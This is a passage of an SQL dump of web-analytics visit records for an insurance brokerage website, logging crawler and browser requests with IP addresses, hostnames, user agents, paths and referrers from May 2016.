7','br','','','','','','','0','0',0),(27797,'0b_790a6888fde1f7c754d895a16b4537e9','1462956030','45.33.59.157','li1009-157.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(27800,'0b_590e8303c8aec362827f970413155c98','1462956650','82.193.127.15','82.193.127.15.cl.ipnet.ua','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ua','','','MJ12bot','','','','3','0',0),(27803,'0b_590e8303c8aec362827f970413155c98','1462956653','82.193.127.15','82.193.127.15.cl.ipnet.ua','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ua','','','MJ12bot','','','','3','0',0),(27806,'0b_590e8303c8aec362827f970413155c98','1462956655','82.193.127.15','82.193.127.15.cl.ipnet.ua','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ua','','','MJ12bot','','','','3','0',0),(27807,'0b_590e8303c8aec362827f970413155c98','1462956660','82.193.127.15','82.193.127.15.cl.ipnet.ua','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ua','','','MJ12bot','','','','3','0',0),(27810,'0b_590e8303c8aec362827f970413155c98','1462956667','82.193.127.15','82.193.127.15.cl.ipnet.ua','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ua','','','MJ12bot','','','','3','0',0),(27813,'0b_590e8303c8aec362827f970413155c98','1462956669','82.193.127.15','82.193.127.15.cl.ipnet.ua','/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ua','','','MJ12bot','','','','3','0',0),(27816,'0b_f22a527b6f319fcba418bc1c962da770','1462959455','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27819,'0b_ca809c5fc7aa005d68f37613eaf84d6b','1462961269','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)','http://meds-online24.com/','',0,'WinXP','AOL 1','ua','','','','','','','0','0',0),(27822,'0b_ca809c5fc7aa005d68f37613eaf84d6b','1462961269','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)','http://meds-online24.com/','',0,'WinXP','AOL 1','ua','','','','','','','0','0',0),(27824,'0b_7e1b7c3ffdfbfdaa72e20203480094fe','1462961762','104.129.28.210','104.129.28.210.static.quadranet.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'Win7','Firefox 15','ua','','','','','','','0','0',0),(27827,'0b_793c64f781427abb45e8e101c46c2412','1462962958','66.249.66.24','crawl-66-249-66-24.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27828,'0b_793c64f781427abb45e8e101c46c2412','1462962959','66.249.66.21','crawl-66-249-66-21.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27831,'0b_95eeee99e9e9db98163a25157e1c606a','1462965857','54.144.249.204','ec2-54-144-249-204.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0','','',0,'WinXP','Firefox 22','us','','','','','','','0','0',0),(27833,'0b_95eeee99e9e9db98163a25157e1c606a','1462965859','54.144.249.204','ec2-54-144-249-204.compute-1.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0','http://www.empireins.com/','',0,'WinXP','Firefox 22','us','','','','','','','0','0',0),(27836,'0b_63377f50644fa5ff9d555609c0638620','1462965863','54.144.249.204','ec2-54-144-249-204.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0','','',0,'WinXP','Firefox 17','us','1024 x 768','','','','','','0','0',0),(27839,'0b_63377f50644fa5ff9d555609c0638620','1462965863','54.144.249.204','ec2-54-144-249-204.compute-1.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0','http://www.empireins.com/','',0,'WinXP','Firefox 17','us','1024 x 768','','','','','','0','0',0),(27840,'0b_63377f50644fa5ff9d555609c0638620','1462965868','54.144.249.204','ec2-54-144-249-204.compute-1.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0','http://www.empireins.com/','',0,'WinXP','Firefox 17','us','1024 x 768','','','','','','0','0',0),(27842,'0b_e716704563a7019ea4956470446b09fb','1462967116','37.0.124.81','37.0.124.81','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; WOW64; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'Win7 x64','Firefox 15','ua','','','','','','','0','0',0),(27843,'0b_2509f865b0266b33c20afdd2f3bef179','1462967414','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(27845,'0b_2509f865b0266b33c20afdd2f3bef179','1462967418','141.8.143.235','spider-141-8-143-235.yandex.com','/igo/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(27846,'0b_7f74f3ec85830030f125fe90b0b0c1dd','1462967860','24.233.190.25','crlspr-24.233.190.25.myacc.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27848,'0b_7f74f3ec85830030f125fe90b0b0c1dd','1462967862','24.233.190.25','crlspr-24.233.190.25.myacc.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27849,'0b_7f74f3ec85830030f125fe90b0b0c1dd','1462967882','24.233.190.25','crlspr-24.233.190.25.myacc.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27851,'0b_7f74f3ec85830030f125fe90b0b0c1dd','1462967891','24.233.190.25','crlspr-24.233.190.25.myacc.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','51',0),(27852,'0b_7f74f3ec85830030f125fe90b0b0c1dd','1462967895','24.233.190.25','crlspr-24.233.190.25.myacc.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','51',0),(27854,'0b_7f74f3ec85830030f125fe90b0b0c1dd','1462967898','24.233.190.25','crlspr-24.233.190.25.myacc.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','51',0),(27855,'0b_7f74f3ec85830030f125fe90b0b0c1dd','1462967900','24.233.190.25','crlspr-24.233.190.25.myacc.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','51',0),(27857,'0b_7f74f3ec85830030f125fe90b0b0c1dd','1462967900','24.233.190.25','crlspr-24.233.190.25.myacc.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27860,'0b_7d2ac9fa253a002a449a6179f1745e85','1462968557','91.210.147.216','216.147.dynamic.pppoe.fregat.ua','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'WinVista','Firefox 15','ru','','','','','','','0','0',0),(27861,'0b_1b68b63ba5da0432cd7e54f4bbb9ea86','1462969045','64.237.54.3','64.237.54.3.choopa.net','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(27863,'0b_bed78e8632866586bc51891e010ef921','1462969182','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27866,'0b_adc7ffc83a3b8c71456e881d79ab6577','1462969197','199.30.25.105','msnbot-199-30-25-105.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b','http://www.empireins.com/','',0,'Win7','BingPreview 1','','','','BingBot','','','','0','0',0),(27867,'0b_e349485da987b9bff7549341806902ee','1462969814','69.30.234.2','69.30.234.2','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(27869,'0b_e349485da987b9bff7549341806902ee','1462969814','69.30.234.2','69.30.234.2','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(27872,'0b_97673a0ddffa0e8b813b96b622554813','1462971163','40.77.167.94','msnbot-40-77-167-94.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27875,'0b_433571ad4bb8df622be1c4622af6e6c7','1462971918','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(27876,'0b_433571ad4bb8df622be1c4622af6e6c7','1462971920','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(27878,'0b_029759ebd1f18ffda2d0dbac257d1bf8','1462973071','107.173.223.42','107-173-223-42-host.colocrossing.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(27881,'0b_2df562f5e56ca2ed6118757fb52e301c','1462974690','40.77.167.94','msnbot-40-77-167-94.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(27884,'0b_7455abcf33c5b26086737ce0903d44b2','1462974691','67.85.210.17','ool-4355d211.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win8','Chrome 50','us','1600 x 900','','','','','','0','0',0),(27887,'0b_2df562f5e56ca2ed6118757fb52e301c','1462974691','40.77.167.94','msnbot-40-77-167-94.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(27890,'0b_7455abcf33c5b26086737ce0903d44b2','1462974692','67.85.210.17','ool-4355d211.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1600 x 900','','','','','','0','0',0),(27893,'0b_2df562f5e56ca2ed6118757fb52e301c','1462974696','40.77.167.11','msnbot-40-77-167-11.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(27896,'0b_2df562f5e56ca2ed6118757fb52e301c','1462974696','40.77.167.11','msnbot-40-77-167-11.search.msn.com','/?page_id=169','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(27899,'0b_2df562f5e56ca2ed6118757fb52e301c','1462974697','40.77.167.11','msnbot-40-77-167-11.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(27900,'0b_2df562f5e56ca2ed6118757fb52e301c','1462974697','40.77.167.11','msnbot-40-77-167-11.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(27903,'0b_2df562f5e56ca2ed6118757fb52e301c','1462974698','40.77.167.11','msnbot-40-77-167-11.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(27905,'0b_2df562f5e56ca2ed6118757fb52e301c','1462974701','40.77.167.11','msnbot-40-77-167-11.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(27908,'0b_2df562f5e56ca2ed6118757fb52e301c','1462974702','40.77.167.11','msnbot-40-77-167-11.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(27911,'0b_2df562f5e56ca2ed6118757fb52e301c','1462974702','40.77.167.11','msnbot-40-77-167-11.search.msn.com','/members/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(27914,'0b_2df562f5e56ca2ed6118757fb52e301c','1462974703','40.77.167.94','msnbot-40-77-167-94.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(27915,'0b_2df562f5e56ca2ed6118757fb52e301c','1462974704','40.77.167.94','msnbot-40-77-167-94.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(27917,'0b_2df562f5e56ca2ed6118757fb52e301c','1462974705','40.77.167.94','msnbot-40-77-167-94.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(27920,'0b_2df562f5e56ca2ed6118757fb52e301c','1462974705','40.77.167.94','msnbot-40-77-167-94.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(27921,'0b_2260b377f4570cb58282f731a92b0257','1462974710','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27924,'0b_2260b377f4570cb58282f731a92b0257','1462974710','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27927,'0b_2260b377f4570cb58282f731a92b0257','1462974711','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27930,'0b_7455abcf33c5b26086737ce0903d44b2','1462974716','67.85.210.17','ool-4355d211.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1600 x 900','','','','','','0','0',0),(27932,'0b_5b03c50515c1f890bf66a0b71b08c040','1462974724','207.46.13.7','msnbot-207-46-13-7.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27935,'0b_5b03c50515c1f890bf66a0b71b08c040','1462974726','207.46.13.7','msnbot-207-46-13-7.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27938,'0b_5b03c50515c1f890bf66a0b71b08c040','1462974727','207.46.13.7','msnbot-207-46-13-7.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27939,'0b_5b03c50515c1f890bf66a0b71b08c040','1462974728','207.46.13.7','msnbot-207-46-13-7.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27941,'0b_7455abcf33c5b26086737ce0903d44b2','1462974734','67.85.210.17','ool-4355d211.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 50','us','1600 x 900','','','','Biny1280','','0','51',0),(27942,'0b_6d0b4eaf9205af2fee8903d673fda426','1462974961','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(27944,'0b_e97a81f3e4f50beef489ca5e103c174f','1462974966','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(27945,'0b_e97a81f3e4f50beef489ca5e103c174f','1462974967','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(27948,'0b_4be9e2eb84237b62c2b9dfdd8c504095','1462975775','68.135.5.60','68.135.5.60','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(27951,'0b_4be9e2eb84237b62c2b9dfdd8c504095','1462975786','68.135.5.60','68.135.5.60','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27953,'0b_4be9e2eb84237b62c2b9dfdd8c504095','1462975797','68.135.5.60','68.135.5.60','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27954,'0b_4be9e2eb84237b62c2b9dfdd8c504095','1462975809','68.135.5.60','68.135.5.60','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27957,'0b_4be9e2eb84237b62c2b9dfdd8c504095','1462975820','68.135.5.60','68.135.5.60','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27959,'0b_4be9e2eb84237b62c2b9dfdd8c504095','1462975831','68.135.5.60','68.135.5.60','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27962,'0b_4be9e2eb84237b62c2b9dfdd8c504095','1462975841','68.135.5.60','68.135.5.60','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27965,'0b_4be9e2eb84237b62c2b9dfdd8c504095','1462975855','68.135.5.60','68.135.5.60','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27966,'0b_4be9e2eb84237b62c2b9dfdd8c504095','1462975867','68.135.5.60','68.135.5.60','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27968,'0b_4be9e2eb84237b62c2b9dfdd8c504095','1462975878','68.135.5.60','68.135.5.60','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27969,'0b_4be9e2eb84237b62c2b9dfdd8c504095','1462975889','68.135.5.60','68.135.5.60','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27972,'0b_4be9e2eb84237b62c2b9dfdd8c504095','1462975900','68.135.5.60','68.135.5.60','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27974,'0b_4be9e2eb84237b62c2b9dfdd8c504095','1462975912','68.135.5.60','68.135.5.60','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27977,'0b_4be9e2eb84237b62c2b9dfdd8c504095','1462975923','68.135.5.60','68.135.5.60','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(27978,'0b_4709ddea62bd6022627c5427ffb9c151','1462976936','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(27980,'0b_4709ddea62bd6022627c5427ffb9c151','1462976936','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(27983,'0b_6a9d7cb00295c28dc90a94ff7c644058','1462978041','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','3','0',0),(27986,'0b_6a9d7cb00295c28dc90a94ff7c644058','1462978043','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','3','0',0),(27989,'0b_6a9d7cb00295c28dc90a94ff7c644058','1462978048','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/register/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','3','0',0),(27990,'0b_6a9d7cb00295c28dc90a94ff7c644058','1462978109','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/register/','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','3','51',0),(27993,'0b_6a9d7cb00295c28dc90a94ff7c644058','1462978128','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/carriers/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','3','51',0),(27996,'0b_6a9d7cb00295c28dc90a94ff7c644058','1462978143','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/?page_id=169','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','3','169',0),(27998,'0b_6a9d7cb00295c28dc90a94ff7c644058','1462978144','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/register/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','3','51',0),(27999,'0b_6a9d7cb00295c28dc90a94ff7c644058','1462978152','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/forms/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/register/','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','3','51',0),(28002,'0b_6a9d7cb00295c28dc90a94ff7c644058','1462978165','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/register/','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','3','51',0),(28004,'0b_6a9d7cb00295c28dc90a94ff7c644058','1462978174','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','3','51',0),(28007,'0b_b5496a15eacb338d11a2836f6ec94082','1462978252','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(28008,'0b_b5496a15eacb338d11a2836f6ec94082','1462978255','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 